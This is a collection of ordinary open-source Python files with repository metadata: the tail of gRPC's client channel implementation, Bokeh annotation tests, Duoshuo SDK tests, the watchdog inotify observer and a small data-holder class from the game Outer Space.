_common.STATUS_CODE_TO_CYGRPC_STATUS_CODE[self._state.code],
self._state.details)
self._state.condition.notify_all()
def _start_unary_request(request, timeout, request_serializer):
deadline = _deadline(timeout)
serialized_request = _common.serialize(request, request_serializer)
if serialized_request is None:
state = _RPCState((), (), (), grpc.StatusCode.INTERNAL,
'Exception serializing request!')
rendezvous = _Rendezvous(state, None, None, deadline)
return deadline, None, rendezvous
else:
return deadline, serialized_request, None
def _end_unary_response_blocking(state, call, with_call, deadline):
if state.code is grpc.StatusCode.OK:
if with_call:
rendezvous = _Rendezvous(state, call, None, deadline)
return state.response, rendezvous
else:
return state.response
else:
raise _Rendezvous(state, None, None, deadline)
def _stream_unary_invocation_operationses(metadata):
return (
(
cygrpc.SendInitialMetadataOperation(metadata, _EMPTY_FLAGS),
cygrpc.ReceiveMessageOperation(_EMPTY_FLAGS),
cygrpc.ReceiveStatusOnClientOperation(_EMPTY_FLAGS),
),
(cygrpc.ReceiveInitialMetadataOperation(_EMPTY_FLAGS),),
)
def _stream_unary_invocation_operationses_and_tags(metadata):
return tuple((
operations,
None,
) for operations in _stream_unary_invocation_operationses(metadata))
class _UnaryUnaryMultiCallable(grpc.UnaryUnaryMultiCallable):
def __init__(self, channel, managed_call, method, request_serializer,
response_deserializer):
self._channel = channel
self._managed_call = managed_call
self._method = method
self._request_serializer = request_serializer
self._response_deserializer = response_deserializer
def _prepare(self, request, timeout, metadata):
deadline, serialized_request, rendezvous = _start_unary_request(
request, timeout, self._request_serializer)
if serialized_request is None:
return None, None, None, rendezvous
else:
state = _RPCState(_UNARY_UNARY_INITIAL_DUE, None, None, None, None)
operations = (
cygrpc.SendInitialMetadataOperation(metadata, _EMPTY_FLAGS),
cygrpc.SendMessageOperation(serialized_request, _EMPTY_FLAGS),
cygrpc.SendCloseFromClientOperation(_EMPTY_FLAGS),
cygrpc.ReceiveInitialMetadataOperation(_EMPTY_FLAGS),
cygrpc.ReceiveMessageOperation(_EMPTY_FLAGS),
cygrpc.ReceiveStatusOnClientOperation(_EMPTY_FLAGS),
)
return state, operations, deadline, None
def _blocking(self, request, timeout, metadata, credentials):
state, operations, deadline, rendezvous = self._prepare(
request, timeout, metadata)
if state is None:
raise rendezvous
else:
call = self._channel.segregated_call(
0, self._method, None, deadline, metadata, None
if credentials is None else credentials._credentials, ((
operations,
None,
),))
event = call.next_event()
_handle_event(event, state, self._response_deserializer)
return state, call,
def __call__(self, request, timeout=None, metadata=None, credentials=None):
state, call, = self._blocking(request, timeout, metadata, credentials)
return _end_unary_response_blocking(state, call, False, None)
def with_call(self, request, timeout=None, metadata=None, credentials=None):
state, call, = self._blocking(request, timeout, metadata, credentials)
return _end_unary_response_blocking(state, call, True, None)
def future(self, request, timeout=None, metadata=None, credentials=None):
state, operations, deadline, rendezvous = self._prepare(
request, timeout, metadata)
if state is None:
raise rendezvous
else:
event_handler = _event_handler(state, self._response_deserializer)
call = self._managed_call(
0, self._method, None, deadline, metadata, None
if credentials is None else credentials._credentials,
(operations,), event_handler)
return _Rendezvous(state, call, self._response_deserializer,
deadline)
class _UnaryStreamMultiCallable(grpc.UnaryStreamMultiCallable):
def __init__(self, channel, managed_call, method, request_serializer,
response_deserializer):
self._channel = channel
self._managed_call = managed_call
self._method = method
self._request_serializer = request_serializer
self._response_deserializer = response_deserializer
def __call__(self, request, timeout=None, metadata=None, credentials=None):
deadline, serialized_request, rendezvous = _start_unary_request(
request, timeout, self._request_serializer)
if serialized_request is None:
raise rendezvous
else:
state = _RPCState(_UNARY_STREAM_INITIAL_DUE, None, None, None, None)
operationses = (
(
cygrpc.SendInitialMetadataOperation(metadata, _EMPTY_FLAGS),
cygrpc.SendMessageOperation(serialized_request,
_EMPTY_FLAGS),
cygrpc.SendCloseFromClientOperation(_EMPTY_FLAGS),
cygrpc.ReceiveStatusOnClientOperation(_EMPTY_FLAGS),
),
(cygrpc.ReceiveInitialMetadataOperation(_EMPTY_FLAGS),),
)
event_handler = _event_handler(state, self._response_deserializer)
call = self._managed_call(
0, self._method, None, deadline, metadata, None
if credentials is None else credentials._credentials,
operationses, event_handler)
return _Rendezvous(state, call, self._response_deserializer,
deadline)
class _StreamUnaryMultiCallable(grpc.StreamUnaryMultiCallable):
def __init__(self, channel, managed_call, method, request_serializer,
response_deserializer):
self._channel = channel
self._managed_call = managed_call
self._method = method
self._request_serializer = request_serializer
self._response_deserializer = response_deserializer
def _blocking(self, request_iterator, timeout, metadata, credentials):
deadline = _deadline(timeout)
state = _RPCState(_STREAM_UNARY_INITIAL_DUE, None, None, None, None)
call = self._channel.segregated_call(
0, self._method, None, deadline, metadata, None
if credentials is None else credentials._credentials,
_stream_unary_invocation_operationses_and_tags(metadata))
_consume_request_iterator(request_iterator, state, call,
self._request_serializer, None)
while True:
event = call.next_event()
with state.condition:
_handle_event(event, state, self._response_deserializer)
state.condition.notify_all()
if not state.due:
break
return state, call,
def __call__(self,
request_iterator,
timeout=None,
metadata=None,
credentials=None):
state, call, = self._blocking(request_iterator, timeout, metadata,
credentials)
return _end_unary_response_blocking(state, call, False, None)
def with_call(self,
request_iterator,
timeout=None,
metadata=None,
credentials=None):
state, call, = self._blocking(request_iterator, timeout, metadata,
credentials)
return _end_unary_response_blocking(state, call, True, None)
def future(self,
request_iterator,
timeout=None,
metadata=None,
credentials=None):
deadline = _deadline(timeout)
state = _RPCState(_STREAM_UNARY_INITIAL_DUE, None, None, None, None)
event_handler = _event_handler(state, self._response_deserializer)
call = self._managed_call(
0, self._method, None, deadline, metadata, None
if credentials is None else credentials._credentials,
_stream_unary_invocation_operationses(metadata), event_handler)
_consume_request_iterator(request_iterator, state, call,
self._request_serializer, event_handler)
return _Rendezvous(state, call, self._response_deserializer, deadline)
class _StreamStreamMultiCallable(grpc.StreamStreamMultiCallable):
def __init__(self, channel, managed_call, method, request_serializer,
response_deserializer):
self._channel = channel
self._managed_call = managed_call
self._method = method
self._request_serializer = request_serializer
self._response_deserializer = response_deserializer
def __call__(self,
request_iterator,
timeout=None,
metadata=None,
credentials=None):
deadline = _deadline(timeout)
state = _RPCState(_STREAM_STREAM_INITIAL_DUE, None, None, None, None)
operationses = (
(
cygrpc.SendInitialMetadataOperation(metadata, _EMPTY_FLAGS),
cygrpc.ReceiveStatusOnClientOperation(_EMPTY_FLAGS),
),
(cygrpc.ReceiveInitialMetadataOperation(_EMPTY_FLAGS),),
)
event_handler = _event_handler(state, self._response_deserializer)
call = self._managed_call(
0, self._method, None, deadline, metadata, None
if credentials is None else credentials._credentials, operationses,
event_handler)
_consume_request_iterator(request_iterator, state, call,
self._request_serializer, event_handler)
return _Rendezvous(state, call, self._response_deserializer, deadline)
class _ChannelCallState(object):
def __init__(self, channel):
self.lock = threading.Lock()
self.channel = channel
self.managed_calls = 0
self.threading = False
def reset_postfork_child(self):
self.managed_calls = 0
def _run_channel_spin_thread(state):
def channel_spin():
while True:
cygrpc.block_if_fork_in_progress(state)
event = state.channel.next_call_event()
if event.completion_type == cygrpc.CompletionType.queue_timeout:
continue
call_completed = event.tag(event)
if call_completed:
with state.lock:
state.managed_calls -= 1
if state.managed_calls == 0:
return
channel_spin_thread = cygrpc.ForkManagedThread(target=channel_spin)
channel_spin_thread.setDaemon(True)
channel_spin_thread.start()
def _channel_managed_call_management(state):
# pylint: disable=too-many-arguments
def create(flags, method, host, deadline, metadata, credentials,
operationses, event_handler):
"""Creates a cygrpc.IntegratedCall.
Args:
flags: An integer bitfield of call flags.
method: The RPC method.
host: A host string for the created call.
deadline: A float to be the deadline of the created call or None if
the call is to have an infinite deadline.
metadata: The metadata for the call or None.
credentials: A cygrpc.CallCredentials or None.
operationses: An iterable of iterables of cygrpc.Operations to be
started on the call.
event_handler: A behavior to call to handle the events resultant from
the operations on the call.
Returns:
A cygrpc.IntegratedCall with which to conduct an RPC.
"""
operationses_and_tags = tuple((
operations,
event_handler,
) for operations in operationses)
with state.lock:
call = state.channel.integrated_call(flags, method, host, deadline,
metadata, credentials,
operationses_and_tags)
if state.managed_calls == 0:
state.managed_calls = 1
_run_channel_spin_thread(state)
else:
state.managed_calls += 1
return call
return create
class _ChannelConnectivityState(object):
def __init__(self, channel):
self.lock = threading.RLock()
self.channel = channel
self.polling = False
self.connectivity = None
self.try_to_connect = False
self.callbacks_and_connectivities = []
self.delivering = False
def reset_postfork_child(self):
self.polling = False
self.connectivity = None
self.try_to_connect = False
self.callbacks_and_connectivities = []
self.delivering = False
def _deliveries(state):
callbacks_needing_update = []
for callback_and_connectivity in state.callbacks_and_connectivities:
callback, callback_connectivity, = callback_and_connectivity
if callback_connectivity is not state.connectivity:
callbacks_needing_update.append(callback)
callback_and_connectivity[1] = state.connectivity
return callbacks_needing_update
def _deliver(state, initial_connectivity, initial_callbacks):
connectivity = initial_connectivity
callbacks = initial_callbacks
while True:
for callback in callbacks:
cygrpc.block_if_fork_in_progress(state)
callable_util.call_logging_exceptions(
callback, _CHANNEL_SUBSCRIPTION_CALLBACK_ERROR_LOG_MESSAGE,
connectivity)
with state.lock:
callbacks = _deliveries(state)
if callbacks:
connectivity = state.connectivity
else:
state.delivering = False
return
def _spawn_delivery(state, callbacks):
delivering_thread = cygrpc.ForkManagedThread(
target=_deliver, args=(
state,
state.connectivity,
callbacks,
))
delivering_thread.start()
state.delivering = True
# NOTE(https://github.com/grpc/grpc/issues/3064): We'd rather not poll.
def _poll_connectivity(state, channel, initial_try_to_connect):
try_to_connect = initial_try_to_connect
connectivity = channel.check_connectivity_state(try_to_connect)
with state.lock:
state.connectivity = (
_common.CYGRPC_CONNECTIVITY_STATE_TO_CHANNEL_CONNECTIVITY[
connectivity])
callbacks = tuple(callback
for callback, unused_but_known_to_be_none_connectivity
in state.callbacks_and_connectivities)
for callback_and_connectivity in state.callbacks_and_connectivities:
callback_and_connectivity[1] = state.connectivity
if callbacks:
_spawn_delivery(state, callbacks)
while True:
event = channel.watch_connectivity_state(connectivity,
time.time() + 0.2)
cygrpc.block_if_fork_in_progress(state)
with state.lock:
if not state.callbacks_and_connectivities and not state.try_to_connect:
state.polling = False
state.connectivity = None
break
try_to_connect = state.try_to_connect
state.try_to_connect = False
if event.success or try_to_connect:
connectivity = channel.check_connectivity_state(try_to_connect)
with state.lock:
state.connectivity = (
_common.CYGRPC_CONNECTIVITY_STATE_TO_CHANNEL_CONNECTIVITY[
connectivity])
if not state.delivering:
callbacks = _deliveries(state)
if callbacks:
_spawn_delivery(state, callbacks)
def _moot(state):
with state.lock:
del state.callbacks_and_connectivities[:]
def _subscribe(state, callback, try_to_connect):
with state.lock:
if not state.callbacks_and_connectivities and not state.polling:
polling_thread = cygrpc.ForkManagedThread(
target=_poll_connectivity,
args=(state, state.channel, bool(try_to_connect)))
polling_thread.setDaemon(True)
polling_thread.start()
state.polling = True
state.callbacks_and_connectivities.append([callback, None])
elif not state.delivering and state.connectivity is not None:
_spawn_delivery(state, (callback,))
state.try_to_connect |= bool(try_to_connect)
state.callbacks_and_connectivities.append(
[callback, state.connectivity])
else:
state.try_to_connect |= bool(try_to_connect)
state.callbacks_and_connectivities.append([callback, None])
def _unsubscribe(state, callback):
with state.lock:
for index, (subscribed_callback, unused_connectivity) in enumerate(
state.callbacks_and_connectivities):
if callback == subscribed_callback:
state.callbacks_and_connectivities.pop(index)
break
def _options(options):
return list(options) + [
(
cygrpc.ChannelArgKey.primary_user_agent_string,
_USER_AGENT,
),
]
class Channel(grpc.Channel):
"""A cygrpc.Channel-backed implementation of grpc.Channel."""
def __init__(self, target, options, credentials):
"""Constructor.
Args:
target: The target to which to connect.
options: Configuration options for the channel.
credentials: A cygrpc.ChannelCredentials or None.
"""
self._channel = cygrpc.Channel(
_common.encode(target), _options(options), credentials)
self._call_state = _ChannelCallState(self._channel)
self._connectivity_state = _ChannelConnectivityState(self._channel)
cygrpc.fork_register_channel(self)
def subscribe(self, callback, try_to_connect=None):
_subscribe(self._connectivity_state, callback, try_to_connect)
def unsubscribe(self, callback):
_unsubscribe(self._connectivity_state, callback)
def unary_unary(self,
method,
request_serializer=None,
response_deserializer=None):
return _UnaryUnaryMultiCallable(
self._channel, _channel_managed_call_management(self._call_state),
_common.encode(method), request_serializer, response_deserializer)
def unary_stream(self,
method,
request_serializer=None,
response_deserializer=None):
return _UnaryStreamMultiCallable(
self._channel, _channel_managed_call_management(self._call_state),
_common.encode(method), request_serializer, response_deserializer)
def stream_unary(self,
method,
request_serializer=None,
response_deserializer=None):
return _StreamUnaryMultiCallable(
self._channel, _channel_managed_call_management(self._call_state),
_common.encode(method), request_serializer, response_deserializer)
def stream_stream(self,
method,
request_serializer=None,
response_deserializer=None):
return _StreamStreamMultiCallable(
self._channel, _channel_managed_call_management(self._call_state),
_common.encode(method), request_serializer, response_deserializer)
def _close(self):
self._channel.close(cygrpc.StatusCode.cancelled, 'Channel closed!')
_moot(self._connectivity_state)
def _close_on_fork(self):
self._channel.close_on_fork(cygrpc.StatusCode.cancelled,
'Channel closed due to fork')
_moot(self._connectivity_state)
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self._close()
return False
def close(self):
self._close()
def __del__(self):
# TODO(https://github.com/grpc/grpc/issues/12531): Several releases
# after 1.12 (1.16 or thereabouts?) add a "self._channel.close" call
# here (or more likely, call self._close() here). We don't do this today
# because many valid use cases today allow the channel to be deleted
# immediately after stubs are created. After a sufficient period of time
# has passed for all users to be trusted to hang out to their channels
# for as long as they are in use and to close them after using them,
# then deletion of this grpc._channel.Channel instance can be made to
# effect closure of the underlying cygrpc.Channel instance.
cygrpc.fork_unregister_channel(self)
_moot(self._connectivity_state)
| apache-2.0 |
azjps/bokeh | bokeh/models/tests/test_annotations.py | 3 | 10963 | from __future__ import absolute_import
import mock
from bokeh.core.properties import field, value
from bokeh.core.validation import check_integrity
from bokeh.models.annotations import (
Legend, LegendItem, ColorBar, Arrow, BoxAnnotation, Span, LabelSet, Label, Title
)
from bokeh.models import (
ColumnDataSource, ArrowHead, BasicTicker, BasicTickFormatter, GlyphRenderer
)
from .utils.property_utils import (
FILL, LINE, TEXT, ANGLE, prefix,
check_properties_existence, check_fill_properties,
check_line_properties, check_text_properties
)
def test_Legend():
legend = Legend()
assert legend.plot is None
assert legend.location == 'top_right'
assert legend.label_standoff == 5
assert legend.label_height == 20
assert legend.label_width == 20
assert legend.glyph_height == 20
assert legend.glyph_width == 20
assert legend.padding == 10
assert legend.spacing == 3
assert legend.margin == 10
assert legend.items == []
check_line_properties(legend, "border_", "#e5e5e5", 1.0, 0.5)
check_text_properties(legend, "label_", "10pt", "middle")
check_fill_properties(legend, "background_", "#ffffff", 0.95)
check_properties_existence(legend, [
"plot",
"visible",
"location",
"orientation",
"label_standoff",
"label_height",
"label_width",
"glyph_height",
"glyph_width",
"margin",
"padding",
"spacing",
"items",
"level"],
prefix('label_', TEXT),
prefix('border_', LINE),
prefix('background_', FILL))
def test_ColorBar():
color_bar = ColorBar()
assert color_bar.plot is None
assert color_bar.location == 'top_right'
assert color_bar.orientation == 'vertical'
assert color_bar.height == 'auto'
assert color_bar.width == 'auto'
assert color_bar.scale_alpha == 1.0
assert color_bar.title is None
assert color_bar.title_standoff == 2
assert isinstance(color_bar.ticker, BasicTicker)
assert isinstance(color_bar.formatter, BasicTickFormatter)
assert color_bar.color_mapper is None
assert color_bar.margin == 30
assert color_bar.padding == 10
assert color_bar.label_standoff == 5
assert color_bar.major_tick_in == 5
assert color_bar.major_tick_out == 0
assert color_bar.minor_tick_in == 0
assert color_bar.minor_tick_out == 0
check_text_properties(color_bar, "title_", "10pt", "bottom", "italic")
check_text_properties(color_bar, "major_label_", "8pt", "middle", "normal", "center")
check_line_properties(color_bar, "major_tick_", "#ffffff")
check_line_properties(color_bar, "minor_tick_", None)
check_line_properties(color_bar, "bar_", None)
check_line_properties(color_bar, "border_", None)
check_fill_properties(color_bar, "background_", "#ffffff", 0.95)
check_properties_existence(color_bar, [
"plot",
"level",
"visible",
"location",
"orientation",
"height",
"width",
"scale_alpha",
"title",
"title_standoff",
"ticker",
"formatter",
"color_mapper",
"margin",
"padding",
"label_standoff",
"major_tick_in",
"major_tick_out",
"minor_tick_in",
"minor_tick_out"],
prefix('title_', TEXT),
prefix('major_label_', TEXT),
prefix('major_tick_', LINE),
prefix('minor_tick_', LINE),
prefix('bar_', LINE),
prefix('border_', LINE),
prefix('background_', FILL)
)
def test_Arrow():
arrow = Arrow()
assert arrow.plot is None
assert arrow.x_start is None
assert arrow.y_start is None
assert arrow.start_units == 'data'
assert arrow.start is None
assert arrow.x_end is None
assert arrow.y_end is None
assert arrow.end_units == 'data'
assert isinstance(arrow.end, ArrowHead)
assert arrow.source is None
assert arrow.x_range_name == "default"
assert arrow.y_range_name == "default"
check_line_properties(arrow)
check_properties_existence(arrow, [
"plot",
"level",
"visible",
"x_start",
"y_start",
"start_units",
"start",
"x_end",
"y_end",
"end_units",
"end",
"source",
"x_range_name",
"y_range_name"],
LINE)
def test_BoxAnnotation():
box = BoxAnnotation()
assert box.plot is None
assert box.left is None
assert box.left_units == 'data'
assert box.right is None
assert box.right_units == 'data'
assert box.bottom is None
assert box.bottom_units == 'data'
assert box.top is None
assert box.top_units == 'data'
assert box.x_range_name == 'default'
assert box.y_range_name == 'default'
assert box.level == 'annotation'
check_line_properties(box, "", '#cccccc', 1, 0.3)
check_fill_properties(box, "", "#fff9ba", 0.4)
check_properties_existence(box, [
"render_mode",
"plot",
"visible",
"left",
"left_units",
"right",
"right_units",
"bottom",
"bottom_units",
"top",
"top_units",
"x_range_name",
"y_range_name",
"level",
], LINE, FILL)
def test_Label():
label = Label()
assert label.plot is None
assert label.level == 'annotation'
assert label.x is None
assert label.y is None
assert label.x_units == 'data'
assert label.y_units == 'data'
assert label.text is None
assert label.angle == 0
assert label.angle_units == 'rad'
assert label.x_offset == 0
assert label.y_offset == 0
assert label.render_mode == 'canvas'
assert label.x_range_name == 'default'
assert label.y_range_name == 'default'
check_text_properties(label)
check_fill_properties(label, "background_", None, 1.0)
check_line_properties(label, "border_", None, 1.0, 1.0)
check_properties_existence(label, [
"plot",
"level",
"visible",
"x",
"y",
"x_units",
"y_units",
"text",
"angle",
"angle_units",
"x_offset",
"y_offset",
"render_mode",
"x_range_name",
"y_range_name"],
TEXT,
prefix('border_', LINE),
prefix('background_', FILL))
def test_LabelSet():
label_set = LabelSet()
assert label_set.plot is None
assert label_set.level == 'annotation'
assert label_set.x is None
assert label_set.y is None
assert label_set.x_units == 'data'
assert label_set.y_units == 'data'
assert label_set.text == 'text'
assert label_set.angle == 0
assert label_set.angle_units == 'rad'
assert label_set.x_offset == 0
assert label_set.y_offset == 0
assert label_set.render_mode == 'canvas'
assert label_set.x_range_name == 'default'
assert label_set.y_range_name == 'default'
assert isinstance(label_set.source, ColumnDataSource)
assert label_set.source.data == {}
check_text_properties(label_set)
check_fill_properties(label_set, "background_", None, 1.0)
check_line_properties(label_set, "border_", None, 1.0, 1.0)
check_properties_existence(label_set, [
"plot",
"visible",
"level",
"x",
"y",
"x_units",
"y_units",
"text",
"angle",
"angle_units",
"x_offset",
"y_offset",
"render_mode",
"x_range_name",
"y_range_name",
"source"],
TEXT,
ANGLE,
prefix('border_', LINE),
prefix('background_', FILL))
def test_Span():
line = Span()
assert line.plot is None
assert line.location is None
assert line.location_units == 'data'
assert line.dimension == 'width'
assert line.x_range_name == 'default'
assert line.y_range_name == 'default'
assert line.level == 'annotation'
assert line.render_mode == 'canvas'
check_line_properties(line, "", 'black', 1.0)
check_properties_existence(line, [
"plot",
"visible",
"location",
"location_units",
"dimension",
"x_range_name",
"y_range_name",
"level",
"render_mode"
], LINE)
def test_Title():
title = Title()
assert title.plot is None
assert title.level == 'annotation'
assert title.text is None
assert title.align == 'left'
assert title.offset == 0
assert title.text_font == 'helvetica'
assert title.text_font_size == {'value': '10pt'}
assert title.text_font_style == 'bold'
assert title.text_color == '#444444'
assert title.text_alpha == 1.0
check_fill_properties(title, "background_", None, 1.0)
check_line_properties(title, "border_", None, 1.0, 1.0)
check_properties_existence(title, [
"plot",
"visible",
"level",
"text",
"align",
"offset",
"text_font",
"text_font_size",
"text_font_style",
"text_color",
"text_alpha",
"render_mode"],
prefix('border_', LINE),
prefix('background_', FILL))
def test_can_add_multiple_glyph_renderers_to_legend_item():
legend_item = LegendItem()
gr_1 = GlyphRenderer()
gr_2 = GlyphRenderer()
legend_item.renderers = [gr_1, gr_2]
with mock.patch('bokeh.core.validation.check.logger') as mock_logger:
check_integrity([legend_item])
assert mock_logger.error.call_count == 0
def test_legend_item_with_field_label_and_different_data_sources_raises_a_validation_error():
legend_item = LegendItem()
gr_1 = GlyphRenderer(data_source=ColumnDataSource(data={'label': [1]}))
gr_2 = GlyphRenderer(data_source=ColumnDataSource(data={'label': [1]}))
legend_item.label = field('label')
legend_item.renderers = [gr_1, gr_2]
with mock.patch('bokeh.core.validation.check.logger') as mock_logger:
check_integrity([legend_item])
assert mock_logger.error.call_count == 1
def test_legend_item_with_value_label_and_different_data_sources_does_not_raise_a_validation_error():
legend_item = LegendItem()
gr_1 = GlyphRenderer(data_source=ColumnDataSource())
gr_2 = GlyphRenderer(data_source=ColumnDataSource())
legend_item.label = value('label')
legend_item.renderers = [gr_1, gr_2]
with mock.patch('bokeh.core.validation.check.logger') as mock_logger:
check_integrity([legend_item])
assert mock_logger.error.call_count == 0
def test_legend_item_with_field_label_raises_error_if_field_not_in_cds():
legend_item = LegendItem()
gr_1 = GlyphRenderer(data_source=ColumnDataSource())
legend_item.label = field('label')
legend_item.renderers = [gr_1]
with mock.patch('bokeh.core.validation.check.logger') as mock_logger:
check_integrity([legend_item])
assert mock_logger.error.call_count == 1
| bsd-3-clause |
warriorzcx/duoshuo-python-sdk | duoshuo/tests.py | 5 | 1686 | # -*- coding:utf-8 -*-
#!/usr/bin/env python
"""
多说API测试文件。作为通用的Python程序,没有使用Django的TestCase
"""
import os
import unittest
try:
import json
_parse_json = lambda s: json.loads(s)
except ImportError:
try:
import simplejson
_parse_json = lambda s: simplejson.loads(s)
except ImportError:
from django.utils import simplejson
_parse_json = lambda s: simplejson.loads(s)
os.sys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
import duoshuo
import utils
class DuoshuoAPITest(unittest.TestCase):
DUOSHUO_SHORT_NAME = 'official'
DUOSHUO_SECRET = 'a'*32
API = duoshuo.DuoshuoAPI(short_name=DUOSHUO_SHORT_NAME, secret=DUOSHUO_SECRET)
def test_host(self):
api = self.API
host = api.host
self.assertEqual(host, 'api.duoshuo.com')
def test_get_url(self):
redirect_uri = 'example.com'
api = self.API
url = utils.get_url(api, redirect_uri=redirect_uri)
self.assertEqual(url,
'http://%s/oauth2/authorize?client_id=%s&redirect_uri=%s&response_type=code' %
(api.host, self.DUOSHUO_SHORT_NAME, redirect_uri)
)
def test_user_api(self):
api = self.API
response = api.users.profile(user_id=1)
user_id = response['response']['user_id']
self.assertEqual(int(user_id), 1)
# 以下测试要是short_name和secret正确设置
# def test_log_api(self):
# api = self.API
# response = api.log.list()
# code = response['code']
# self.assertEqual(int(code), 0)
if __name__ == '__main__':
unittest.main()
| apache-2.0 |
yildizberkay/MongoApp | libs/watchdog/observers/inotify.py | 3 | 7033 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright 2011 Yesudeep Mangalapilly <yesudeep@gmail.com>
# Copyright 2012 Google, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
:module: watchdog.observers.inotify
:synopsis: ``inotify(7)`` based emitter implementation.
:author: Sebastien Martini <seb@dbzteam.org>
:author: Luke McCarthy <luke@iogopro.co.uk>
:author: yesudeep@google.com (Yesudeep Mangalapilly)
:author: Tim Cuthbertson <tim+github@gfxmonk.net>
:platforms: Linux 2.6.13+.
.. ADMONITION:: About system requirements
Recommended minimum kernel version: 2.6.25.
Quote from the inotify(7) man page:
"Inotify was merged into the 2.6.13 Linux kernel. The required library
interfaces were added to glibc in version 2.4. (IN_DONT_FOLLOW,
IN_MASK_ADD, and IN_ONLYDIR were only added in version 2.5.)"
Therefore, you must ensure the system is running at least these versions
appropriate libraries and the kernel.
.. ADMONITION:: About recursiveness, event order, and event coalescing
Quote from the inotify(7) man page:
If successive output inotify events produced on the inotify file
descriptor are identical (same wd, mask, cookie, and name) then they
are coalesced into a single event if the older event has not yet been
read (but see BUGS).
The events returned by reading from an inotify file descriptor form
an ordered queue. Thus, for example, it is guaranteed that when
renaming from one directory to another, events will be produced in
the correct order on the inotify file descriptor.
...
Inotify monitoring of directories is not recursive: to monitor
subdirectories under a directory, additional watches must be created.
This emitter implementation therefore automatically adds watches for
sub-directories if running in recursive mode.
Some extremely useful articles and documentation:
.. _inotify FAQ: http://inotify.aiken.cz/?section=inotify&page=faq&lang=en
.. _intro to inotify: http://www.linuxjournal.com/article/8478
"""
from __future__ import with_statement
from watchdog.utils import platform
if not platform.is_linux():
raise ImportError
import threading
from inotify_c import Inotify
from watchdog.observers.api import (
EventEmitter,
BaseObserver,
DEFAULT_EMITTER_TIMEOUT,
DEFAULT_OBSERVER_TIMEOUT
)
from watchdog.events import (
DirDeletedEvent,
DirModifiedEvent,
DirMovedEvent,
DirCreatedEvent,
FileDeletedEvent,
FileModifiedEvent,
FileMovedEvent,
FileCreatedEvent,
EVENT_TYPE_MODIFIED,
EVENT_TYPE_CREATED,
EVENT_TYPE_DELETED,
EVENT_TYPE_MOVED
)
ACTION_EVENT_MAP = {
(True, EVENT_TYPE_MODIFIED): DirModifiedEvent,
(True, EVENT_TYPE_CREATED): DirCreatedEvent,
(True, EVENT_TYPE_DELETED): DirDeletedEvent,
(True, EVENT_TYPE_MOVED): DirMovedEvent,
(False, EVENT_TYPE_MODIFIED): FileModifiedEvent,
(False, EVENT_TYPE_CREATED): FileCreatedEvent,
(False, EVENT_TYPE_DELETED): FileDeletedEvent,
(False, EVENT_TYPE_MOVED): FileMovedEvent,
}
class InotifyEmitter(EventEmitter):
"""
inotify(7)-based event emitter.
:param event_queue:
The event queue to fill with events.
:param watch:
A watch object representing the directory to monitor.
:type watch:
:class:`watchdog.observers.api.ObservedWatch`
:param timeout:
Read events blocking timeout (in seconds).
:type timeout:
``float``
"""
def __init__(self, event_queue, watch, timeout=DEFAULT_EMITTER_TIMEOUT):
EventEmitter.__init__(self, event_queue, watch, timeout)
self._lock = threading.Lock()
self._inotify = Inotify(watch.path, watch.is_recursive)
def on_thread_stop(self):
self._inotify.close()
def queue_events(self, timeout):
with self._lock:
inotify_events = self._inotify.read_events()
if not any([event.is_moved_from or event.is_moved_to for event in inotify_events]):
self._inotify.clear_move_records()
for event in inotify_events:
if event.is_moved_to:
# TODO: Sometimes this line will bomb even when a previous
# moved_from event with the same cookie has fired. I have
# yet to figure out why this is the case, so we're
# temporarily swallowing the exception and the move event.
# This happens only during massively quick file movement
# for example, when you execute `git gc` in a monitored
# directory.
try:
src_path = self._inotify.source_for_move(event)
to_event = event
dest_path = to_event.src_path
klass = ACTION_EVENT_MAP[(to_event.is_directory, EVENT_TYPE_MOVED)]
event = klass(src_path, dest_path)
self.queue_event(event)
# Generate sub events for the directory if recursive.
if event.is_directory and self.watch.is_recursive:
for sub_event in event.sub_moved_events():
self.queue_event(sub_event)
except KeyError:
pass
elif event.is_attrib:
klass = ACTION_EVENT_MAP[(event.is_directory, EVENT_TYPE_MODIFIED)]
self.queue_event(klass(event.src_path))
elif event.is_modify:
klass = ACTION_EVENT_MAP[(event.is_directory, EVENT_TYPE_MODIFIED)]
self.queue_event(klass(event.src_path))
elif event.is_delete or event.is_delete_self:
klass = ACTION_EVENT_MAP[(event.is_directory, EVENT_TYPE_DELETED)]
self.queue_event(klass(event.src_path))
elif event.is_create:
klass = ACTION_EVENT_MAP[(event.is_directory, EVENT_TYPE_CREATED)]
self.queue_event(klass(event.src_path))
class InotifyObserver(BaseObserver):
"""
Observer thread that schedules watching directories and dispatches
calls to event handlers.
"""
def __init__(self, timeout=DEFAULT_OBSERVER_TIMEOUT):
BaseObserver.__init__(self, emitter_class=InotifyEmitter,
timeout=timeout)
| apache-2.0 |
ospaceteam/outerspace | server/lib/ige/IDataHolder.py | 2 | 1552 | #
# Copyright 2001 - 2016 Ludek Smid [http://www.ospace.net/]
#
# This file is part of Outer Space.
#
# Outer Space is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# Outer Space is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Outer Space; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
#
# general holder for ALL data in game
class IDataHolder:
#def __setattr__(self, key, value):
# self.__dict__[key] = value
# self.__dict__['_v_modified'] = 1
#def setModified(self, modified):
# self.__dict__['_v_modified'] = modified
# for debug only
def __repr__(self):
result = '<%s.%s %X ' % (self.__class__.__module__, self.__class__.__name__, id(self))
items = self.__dict__.items()
items.sort()
for key, value in items:
result += '%s=%s, ' % (key, repr(value))
result += '>'
return result
def makeIDataHolder(**kwargs):
obj = IDataHolder()
for key, value in kwargs.items():
setattr(obj, key, value)
return obj
| gpl-2.0 |
